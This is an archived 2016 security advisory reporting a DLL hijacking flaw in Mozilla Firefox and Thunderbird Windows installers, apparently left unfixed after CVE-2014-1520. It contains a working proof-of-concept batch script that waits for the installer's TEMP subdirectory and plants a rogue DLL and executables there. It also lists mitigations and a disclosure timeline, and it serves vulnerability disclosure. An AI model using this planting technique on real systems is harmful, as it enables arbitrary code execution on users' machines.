exploit the possibilities

Mozilla Firefox DLL Hijacking

Mozilla Firefox DLL Hijacking
Posted Jun 15, 2016
Authored by Stefan Kanthak

The fix applied for CVE-2014-1520 does not fix a DLL hijacking issue with Mozilla Firefox's executable installer.

tags | exploit
systems | windows
advisories | CVE-2014-1520
MD5 | 8ccb338cab7271385d9a014995b5be12

Mozilla Firefox DLL Hijacking

Change Mirror Download
Hi @ll,

<https://bugzilla.mozilla.org/show_bug.cgi?id=961676> should
have fixed CVE-2014-1520 in Mozilla's executable installers for
Windows ... but does NOT!

JFTR: this type of vulnerability (really: a bloody stupid trivial
beginner's error!) is well-known and well-documented as
<https://cwe.mitre.org/data/definitions/379.html>.


Proof of concept/demonstration:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

0. download "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",
"Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"
and save them in an arbitrary directory;

1. download <http://home.arcor.de/skanthak/download/SHFOLDER.DLL>
plus <http://home.arcor.de/skanthak/download/SENTINEL.EXE> and
save them in an(other) arbitrary directory;

2. start your editor, copy and paste the following 10 lines and
save them as "POC.CMD" in the same directory as "SHFOLDER.DLL"
and "SENTINEL.EXE" downloaded in step 1:

:WAIT1
@If Not Exist "%TEMP%\7z*.tmp" Goto :WAIT1
For /D %%! In ("%TEMP%\7z*.tmp") Do Set foobar=%%!
Copy "%~dp0shfolder.dll" "%foobar%\shfolder.dll"
:WAIT2
@If Not Exist "%foobar%\core\maintenanceservice.exe" Goto :WAIT2
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice.exe"
:WAIT3
@If Not Exist "%foobar%\core\maintenanceservice_installer.exe" Goto :WAIT3
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice_installer.exe"

3. execute the batch script "POC.CMD" created in step 2;

4. execute "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",
"Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"
downloaded in step 0. and proceed as directed: notice the message
boxed displayed from the copies of "SHFOLDER.DLL" and "SENTINEL.EXE"
placed by the batch script started in step 3 in the unsafe TEMP
subdirectory created by Mozilla's vulnerable executable installers!

PWNED!


Mitigation(s):
~~~~~~~~~~~~~~

0. don't use executable installers. DUMP THEM, NOW!

1. see <http://home.arcor.de/skanthak/!execute.html> as well as
<http://home.arcor.de/skanthak/SAFER.html>.

2. stay away from Mozilla's vulnerable installers for their Windows
software (at least until Mozilla starts to develop a sense for
the safety and security of their users).


stay tuned
Stefan Kanthak


Timeline:
~~~~~~~~~

2015-10-25 <https://bugzilla.mozilla.org/show_bug.cgi?id=1218199>

not even an attempt to fix this vulnerability (check but
<https://blog.mozilla.org/blog/2015/10/23/mozilla-launches-open-source-support-program/>)

2016-04-30 <https://bugzilla.mozilla.org/show_bug.cgi?id=1269111>
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269113>
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269122>
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269123>
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269142>
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269144>

not even an attempt to fix this vulnerability (check but
<https://blog.mozilla.org/blog/2016/06/09/help-make-open-source-secure/>)

2016-06-15 deadline expired after 45 days, report published
Login or Register to add favorites

File Archive:

October 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    25 Files
  • 2
    Oct 2nd
    13 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    1 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    15 Files
  • 7
    Oct 7th
    15 Files
  • 8
    Oct 8th
    11 Files
  • 9
    Oct 9th
    3 Files
  • 10
    Oct 10th
    1 Files
  • 11
    Oct 11th
    1 Files
  • 12
    Oct 12th
    8 Files
  • 13
    Oct 13th
    12 Files
  • 14
    Oct 14th
    23 Files
  • 15
    Oct 15th
    4 Files
  • 16
    Oct 16th
    13 Files
  • 17
    Oct 17th
    1 Files
  • 18
    Oct 18th
    1 Files
  • 19
    Oct 19th
    27 Files
  • 20
    Oct 20th
    41 Files
  • 21
    Oct 21st
    18 Files
  • 22
    Oct 22nd
    16 Files
  • 23
    Oct 23rd
    2 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close